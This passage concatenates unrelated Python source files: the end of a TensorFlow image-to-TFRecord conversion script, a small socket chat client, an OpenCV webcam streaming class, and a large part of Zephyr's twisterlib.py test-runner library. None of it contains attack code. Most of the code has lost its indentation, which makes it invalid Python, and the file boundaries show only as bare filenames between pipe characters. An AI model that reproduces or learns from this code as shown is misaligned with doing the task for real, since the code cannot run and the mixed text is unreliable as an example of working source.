labels_file: string, path to the labels file.
      The list of valid labels is held in this file. Assumes that the file
      contains entries as such:
        dog
        cat
        flower
      where each line corresponds to a label. We map each label contained in
      the file to an integer starting from 1 for the label contained in the
      first line (label index 0 is reserved for the background class).
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
# unique_labels = []
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
|
client.py
|
import socket
import threading
nickname = input("choose a nickname: ")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('127.0.0.1',55555))
def receive():
while True:
try:
message = client.recv(1024).decode('ascii')
if message == "Nick:":
client.send(nickname.encode('ascii'))
else:
print(message)
except:
print("An error occured!")
client.close()
break
def write():
while True:
message = f'{nickname}:{input("")}'
client.send(message.encode('ascii'))
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
|
cam.py
|
import datetime
from threading import Thread
import cv2
class FPS:
    def __init__(self):
        # use underscore-prefixed attributes so they do not shadow the
        # start()/stop() methods below (assigning self.start = None would
        # otherwise make fps.start() fail)
        self._start = None
        self._end = None
        self._numFrames = 0
    def start(self):
        self._start = datetime.datetime.now()
        return self
    def stop(self):
        self._end = datetime.datetime.now()
    def update(self):
        self._numFrames += 1
    def elapsed(self):
        return (self._end - self._start).total_seconds()
    def get_fps(self):
        return self._numFrames / self.elapsed()
class WebCamVideoStream:
def __init__(self, src=0):
#init opencv stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
#flag to indicate if thread should be stopped
self.stopped = False
def start(self):
Thread(target=self.update, args=()).start()
return self
def update(self):
while True:
if self.stopped:
return
(self.grabbed, self.frame) = self.stream.read()
def read(self):
return self.frame
def stop(self):
self.stopped = True
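# Illustrative usage (an assumption, not part of the original file): grab
# frames from the background capture thread and measure throughput with the
# FPS helper above.
#   stream = WebCamVideoStream(src=0).start()
#   fps = FPS().start()
#   for _ in range(100):  # hypothetical frame budget
#       frame = stream.read()
#       fps.update()
#   fps.stop()
#   stream.stop()
#   print("approx. FPS: %.2f" % fps.get_fps())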
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
import pty
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
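# Illustrative conversions (cache lines are made-up examples): from_line()
# applied to
#   'ZEPHYR_TOOLCHAIN_VARIANT:STRING=zephyr'    -> value 'zephyr'
#   'CONFIG_FOO:BOOL=ON'                        -> a true value via _to_bool()
#   'EXTRA_DTC_OVERLAY_FILE:STRING=a.dts;b.dts' -> value ['a.dts', 'b.dts']
# while comment lines ('//' or '#') and blank lines yield None.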
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return True
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return False
elif val.endswith('-NOTFOUND'):
return False
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.state = state
self.duration = duration
def get_state(self):
ret = (self.state, self.duration)
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
# Note: csv.writer's second positional argument is a dialect; the field
# names are written out as the header row on the next line instead.
cw = csv.writer(csvfile, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently wherever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of how newer ninja (1.6.0 or greater) and .NET / renode work:
# newer versions of ninja don't seem to pass SIGTERM down to their
# children, so we need to use try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
# With shell=True a list argument would only execute its first element,
# so build a single shell command string with GCOV_PREFIX set inline.
subprocess.call("GCOV_PREFIX=" + self.build_dir +
" gcov " + self.sourcedir + " -b -s " + self.build_dir, shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for d in self.suite.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or not (d.serial or d.serial_pty):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.suite.duts:
if d.serial == serial or d.serial_pty:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.suite.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug("Using serial device {}".format(serial_device))
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
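# e.g. (illustrative, values made up): --west-flash="--board-id=42,--erase"
# combined with runner "pyocd" and a probe id of 0123456789 ends up invoking
# roughly:
#   west flash --skip-rebuild -d <build_dir> --runner pyocd -- \
#       --board-id=42 --erase --board-id 0123456789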
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--snr")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
out_state = "flash_error"
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state in ["timeout", "flash_error"]:
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
if out_state == "timeout":
self.instance.reason = "Timeout"
elif out_state == "flash_error":
self.instance.reason = "Flash error"
self.instance.results = harness.tests
# Sometimes an instance fails to execute and leaves an empty results
# dictionary; fill the results with BLOCK so the instance is still
# included in the final report.
if self.instance.results == {}:
for k in self.instance.testcase.cases:
self.instance.results[k] = 'BLOCK'
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time; it is
maintained by counting guest instructions, so we use the QEMU process
execution time to approximate the time spent by the guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
# We may have polled nothing because the host did not schedule
# enough CPU time to the QEMU process during p.poll(this_timeout).
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# twister to judge testing result by console output
is_timeout = True
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join()
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
